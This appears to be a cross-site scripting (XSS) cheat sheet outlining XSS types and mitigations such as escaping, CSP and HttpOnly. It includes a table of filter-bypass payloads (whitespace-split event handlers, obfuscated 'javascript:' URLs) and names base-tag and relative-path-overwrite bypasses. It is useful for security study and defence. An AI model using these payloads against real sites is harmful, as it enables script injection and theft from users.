Skip to content

XSS

Cross-site scripting (XSS) cheat sheet
xsser

  • Type
    • Self-XSS
    • Reflected XSS
    • Stored XSS
  • Mitigation

    • Filter

      Pattern Bypass
      [SPACE]on...= <svg<TAB>onload=alert(1)>
      [SPACE]on...= <svg\nonload=alert(2)>
      [SPACE]on...= <svg/ onload=alert(3)>
      javascript: <a href="\x01javascript:alert(4)">X</a>
      javascript: <a href="java\tscript:alert(5)">X</a>
      javascript: <a href="java&Tab;script:alert(6)">X</a>
      <script JSFuck
    • Escape (HTML Entity)

      Symbol Alternative
      < &lt;
      > &gt;
      " &quot;
    • Content Security Policy (CSP) > CSP Evaluator

      • script-src
      • Nonce
    • trusted-types (Chrome)

    • HTTP response header
    • Define trusted resources
    • HttpOnly
  • Bypass

    • <base>
      • Change base URL of all relative URL
    • Relative Path Overwrite (RPO)
  • Case Study